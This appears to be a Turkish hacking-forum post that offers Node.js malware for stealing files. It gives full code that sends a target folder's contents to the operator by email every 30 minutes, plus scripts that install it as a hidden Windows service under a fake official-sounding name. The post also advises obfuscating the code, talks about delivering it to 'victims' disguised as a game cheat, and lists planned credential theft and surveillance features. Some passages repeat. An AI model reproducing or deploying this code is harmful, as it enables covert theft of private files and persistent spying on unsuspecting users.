Aslında bir ransomware yazılımı diyebiliriz. Node.js ile basit bir şekilde başlayacağız. Bu işleme, eğer talep fazla olursa, geliştirilecek ve uzaktan yönetim şeklinde bir RAT'a dönüştürülecektir.
Şu anda yazılımımız belirlediğimiz herhangi bir dosyadaki içerikleri bizlere mail üzerinden 30 dakikada bir olucak şekilde iletiyor.
Kodumuz:
Şu anda yazılımımız belirlediğimiz herhangi bir dosyadaki içerikleri bizlere mail üzerinden 30 dakikada bir olucak şekilde iletiyor.
Kodumuz:
JavaScript:
import nodemailer from 'nodemailer';
import fs from 'fs';
import path from 'path';
import schedule from 'node-schedule';
const transporter = nodemailer.createTransport({
host: 'host',
port: 465,
secure: true,
auth: {
user: 'mail',
pass: 'sifre',
},
tls: {
rejectUnauthorized: false
}
});
const logMessage = (message) => {
const timestamp = new Date().toISOString();
console.log(`[${timestamp}] ${message}`);
};
const getFilesRecursively = (dirPath) => {
let filesArray = [];
const files = fs.readdirSync(dirPath);
files.forEach(file => {
const filePath = path.join(dirPath, file);
const stat = fs.statSync(filePath);
if (stat.isDirectory()) {
filesArray = [...filesArray, ...getFilesRecursively(filePath)];
} else {
filesArray.push(filePath);
}
});
return filesArray;
};
const sendEmailWithFiles = async () => {
const directoryPath = 'C:/Test dosya';
try {
const allFiles = getFilesRecursively(directoryPath);
if (allFiles.length === 0) {
logMessage('Klasörde gönderilecek dosya bulunamadı.');
return;
}
const attachments = allFiles
.map((file) => {
return {
filename: path.basename(file),
path: file,
};
});
if (attachments.length === 0) {
logMessage('Klasörde gönderilecek geçerli dosya bulunamadı.');
return;
}
logMessage(`${attachments.length} dosya eklendi: ${attachments.map(file => file.filename).join(', ')}`);
const mailOptions = {
from: 'hangi mail tarafından gönderilicek',
to: 'hangi maile gönderilcek',
subject: 'XX Klasordeki dosyalar',
text: 'Klasördeki başarıyla alındı:',
attachments,
};
const info = await transporter.sendMail(mailOptions);
logMessage(`Dosyalar başarıyla gönderildi. Mesaj ID: ${info.messageId}`);
} catch (error) {
logMessage(`Mail gönderim hatası: ${error.message}`);
}
};
logMessage('Yazılım başlatıldı. Bilgisayar dinleniyor...');
sendEmailWithFiles();
schedule.scheduleJob('*/30 * * * *', () => {
logMessage('Mail gönderme işlemi başlatılıyor...');
sendEmailWithFiles();
});TEST İÇİN KURULUM ADIMLARI:
1. Bilgisayarınıza NODE.JS Kurun
2. Herhangi bir kod editöründe nodeware.js adında bir dosya açın ve üstteki kodu giriniz.
3. Kodda kendi mail ayarlarınızı yapınız.
DÜZENLENMESİ GEREKEN KISIMLAR:
1. Bilgisayarınıza NODE.JS Kurun
2. Herhangi bir kod editöründe nodeware.js adında bir dosya açın ve üstteki kodu giriniz.
3. Kodda kendi mail ayarlarınızı yapınız.
DÜZENLENMESİ GEREKEN KISIMLAR:
JavaScript:
const transporter = nodemailer.createTransport({
host: 'host',
port: 465,
secure: true,
auth: {
user: 'mail',
pass: 'sifre',
},
tls: {
rejectUnauthorized: false
}
});
JavaScript:
const mailOptions = {
from: 'hangi mail tarafından gönderilicek',
to: 'hangi maile gönderilcek',
subject: 'XX Klasordeki dosyalar',
text: 'Merhaba, işte klasördeki dosyalar:',
attachments,
};Bu düzenlemeleri yaptıktan sonra, yazılımımızı çalışması için hazırlayabiliriz. Kodun gizli bir şekilde arka planda çalışması için Windows Hizmetlerini kullanacağız.
Bunu ilerki sürümlerde değiştireceğiz. Bu sürümümüzde örnekler ile ilerliyoruz.
Alttaki dosyalarıda kod editörünüzde açınız:
servis-baslat.js
Bunu ilerki sürümlerde değiştireceğiz. Bu sürümümüzde örnekler ile ilerliyoruz.
Alttaki dosyalarıda kod editörünüzde açınız:
servis-baslat.js
JavaScript:
import { Service } from 'node-windows';
const svc = new Service({
name: 'Windows Notları',
description: 'Windows Resmi Uygulaması',
script: 'NODEWARE Dosya Yolunu Girin',
});
svc.on('install', () => {
console.log('Servis başarıyla kuruldu. Şimdi başlatılıyor...');
svc.start();
});
svc.on('error', (err) => {
console.error('Servis kurulumunda hata oluştu:', err);
});
svc.install();servis-kaldir.js
JavaScript:
import { Service } from 'node-windows';
const svc = new Service({
name: 'Windows Notları',
script: 'NODEWARE DOSYA YOLU',
});
svc.on('uninstall', () => {
console.log('Servis başarıyla kaldırıldı.');
});
svc.uninstall();servis-baslat.js çalıştırıldığınızda artık bilgisayar açılıp kapansa bile arka planda yazılım her zaman çalışıyor olacaktır. Bizlere 30 dakikada bir mail üzerinden çaldığı dosyaları iletecektir.
Nodeware dosyanızı çok iyi bir yere saklamanız gerekmektedir.
SIKÇA SORACAĞINIZ SORULAR:
S: Bunu kurbana yedirmemiz çok zor nasıl yapacağız?
C: Bu sürümde örnek olarak yaptık. İstek çok olursa tamamen exe olarak node.js'yide otomatik bir şekilde yükleyen bir sistem yapacağız. Kötü Amaçlı Yazılım kendini otomatik olarak bilgisayara dahil edicektir.
S: Uzaktan Yönetim Özelliği vb. Gelir mi?
C: Evet
Kodunuzu Şifreleyin: JavaScript Obfuscator Tool
const directoryPath = 'C:/Test dosya'; *BU kısımda hangi dosyaların alınacağını seçiniz. Direkt C seçerseniz bilgisayarın C diskindeki tüm dosyalar alınacaktır.
Konuya İlgi Olursa Güncelleme Devamı
- Uzaktan Yönetim Sistemi (Google Bilgilerini Alma, Canlı İzleme, Bildirim Yollama vb.)
- Otomatik exe olarak kurbana yedirme (valorant vp hilesi)
- Instagram Loglama
- Dosya Çalma
- Telegram, Discord Entegrasyonu
İyi forumlar dilerim. Yazılımın gelişmesini ve otomatikleşmesi talebe bağlı olarak seri şeklinde ilerletilicektir.
Nodeware dosyanızı çok iyi bir yere saklamanız gerekmektedir.
SIKÇA SORACAĞINIZ SORULAR:
S: Bunu kurbana yedirmemiz çok zor nasıl yapacağız?
C: Bu sürümde örnek olarak yaptık. İstek çok olursa tamamen exe olarak node.js'yide otomatik bir şekilde yükleyen bir sistem yapacağız. Kötü Amaçlı Yazılım kendini otomatik olarak bilgisayara dahil edicektir.
S: Uzaktan Yönetim Özelliği vb. Gelir mi?
C: Evet
Kodunuzu Şifreleyin: JavaScript Obfuscator Tool
const directoryPath = 'C:/Test dosya'; *BU kısımda hangi dosyaların alınacağını seçiniz. Direkt C seçerseniz bilgisayarın C diskindeki tüm dosyalar alınacaktır.
Konuya İlgi Olursa Güncelleme Devamı
- Uzaktan Yönetim Sistemi (Google Bilgilerini Alma, Canlı İzleme, Bildirim Yollama vb.)
- Otomatik exe olarak kurbana yedirme (valorant vp hilesi)
- Instagram Loglama
- Dosya Çalma
- Telegram, Discord Entegrasyonu
İyi forumlar dilerim. Yazılımın gelişmesini ve otomatikleşmesi talebe bağlı olarak seri şeklinde ilerletilicektir.
Son düzenleme:
